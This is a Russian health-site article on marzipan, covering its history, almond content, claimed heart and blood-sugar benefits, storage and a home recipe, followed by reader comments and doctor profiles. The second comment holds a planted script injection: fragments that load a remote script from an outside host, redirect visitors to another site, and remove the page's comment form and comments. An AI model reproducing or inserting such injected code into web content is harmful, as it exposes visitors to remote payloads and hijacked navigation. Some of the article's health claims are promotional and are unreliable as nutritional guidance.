Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Рецепт на сладкое. Делаем...  >>  Рецепт на сладкое. Делаем марципан
 
Обратная связь
 

Рецепт на сладкое. Делаем марципан

Размер шрифта
13 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Не все то вредно, что сладко. На нашей кухне марципан.

1 

Марципан (итал. marzapane дословно – «хлеб Марта») приготавливается из тертого миндаля путем добавления в массу сахарной пудры.

Тертый миндаль очень пластичен, поэтому из него часто лепят различные фигурки. Фигурки из марципана окрашивают в различные цвета и такими марципанными конфетами и декоративными элементами украшают кондитерские изделия.

По преданию марципан придумали в Италии в год великого неурожая, когда единственным доступным продуктом оказался миндаль. Находчивый итальянский народ тут же научился делать миндальный хлеб, миндальную пиццу, сладкий марципан и спагетти с миндальным соусом.

Состав

Классическое содержание миндаля в марципане составляет не менее 33%. Возможно найти редкие виды марципана, где содержание миндаля составляет 50% или даже 70%.

Полезные свойства

  1. Из миндаля марципан содержит мононенасыщенные жиры (18 г в 100 г продукта) и витамин Е, которые снижают плохой холестерин и защищают от сердечно-сосудистых заболеваний.

  2. Всего в двадцати миндальных орешках находится суточная норма витамина Е. Этот витамин является важным антиоксидантом, улучшает циркуляцию крови. Он необходим для регенерации тканей и обладает еще многими другими полезными свойствами.

  3. Магний расслабляет и расширяет сосуды, что улучшает кровоток и движение минералов по кровотоку. Магний защищает сердце от повреждения свободными радикалами.

  4. В миндале есть калий – важный электролит, который также необходим для сердца и сосудов. Он участвует в сокращении мышц, в том числе и сердца, обеспечивая нормальное кровяное давление и работу сердца.

Употребление миндаля препятствует резкому скачку уровня сахара крови. Поэтому марципан, совмещая в себе миндаль и сахар, не вызывает такого сильного выброса инсулина, как другие сладости.

Пьедестал почета по содержанию мононенасыщенных жиров (в 100 г):

1. Марципан – 18 г
2. Шоколадная глазурь – 11 г
3. Взбитые сливки – 10 г

Как выбрать

Пропорции миндаля и сахара в марципане варьируются, кроме того, в ряде случаев могут быть добавлены дробленые ядра абрикоса и персика, тертые соевые бобы или соевая мука, яичные белки или цельные яйца.

Вместо сахарной пудры производители могут использовать глюкозный сироп или сорбит.

Следует читать этикетку и выбирать продукт с наименьшим количеством добавок.

Белый марципан используется преимущественно для украшения изделий и обычно готовится только из сахара и тертого миндаля. В зависимости от кондитерских традиций в той или иной стране белый марципан может иметь некоторые особенности, например, быть более сухим или более тягучим.

Желтый марципан (или миндальная глазурь) часто применяют для заливки дорогих фруктовых тортов. Его получают при подкрашивании пищевыми красителями белого марципана.

Сырой марципан очень приятен на вкус и им можно глазурировать торты и другие кондитерские изделия.

Как хранить

Марципан хранится в пластиковом пакете, помещенном в герметичный контейнер. В таком виде марципан может храниться месяц в холодильнике или 6 месяцев в морозильной камере.

Перед использованием марципан надо будет подогреть до комнатной температуры.

1

Как готовить

Правильно приготовленная марципановая масса очень пластичная, как пластилин, и легко принимает форму.

Прежде чем приступить к работе, следует помнить о соблюдении правил гигиены: весь инвентарь и рабочее место должны быть чистыми.

Руки и особенно ногти кондитера должны быть чисто вымыты. Многие профессиональные кондитеры одевают хирургические перчатки.

Подкрашивание марципана

В настоящее время предлагаются пищевые красители всевозможных цветов и оттенков. Для окрашивания марципана лучше брать густые, пастообразные красители, поскольку жидкие могут повлиять на консистенцию марципана.

Рецепт домашнего марципана:

1. Бланшировать миндаль. Очищенный сырой миндаль опустите в горячую воду, в которой снимется кожица.
2. Либо высушить миндаль, либо сразу измельчить миндаль в пасту.
3. Из сахара и воды приготовить сахарный сироп.
4. Добавить в сироп толченый миндаль и мешать до тех пор, пока масса не станет однородной. После этого марципановую смесь остудить и еще раз измельчить блендером или пропустить через мясорубку. Получится мягкий эластичный полуфабрикат, который легко режется ножом и принимает любую форму.

Чтобы лепить из марципановой массы было легче, она должна быть достаточно влажной.

 

Сюжеты по теме:
Рецепт на сладкое. Делаем марципан 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

15 февраля 2012 в 18:55

Цитировать   |   Пожаловаться

В Германии очень популярны сладости с марципаном. Очень вкусно.

2 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.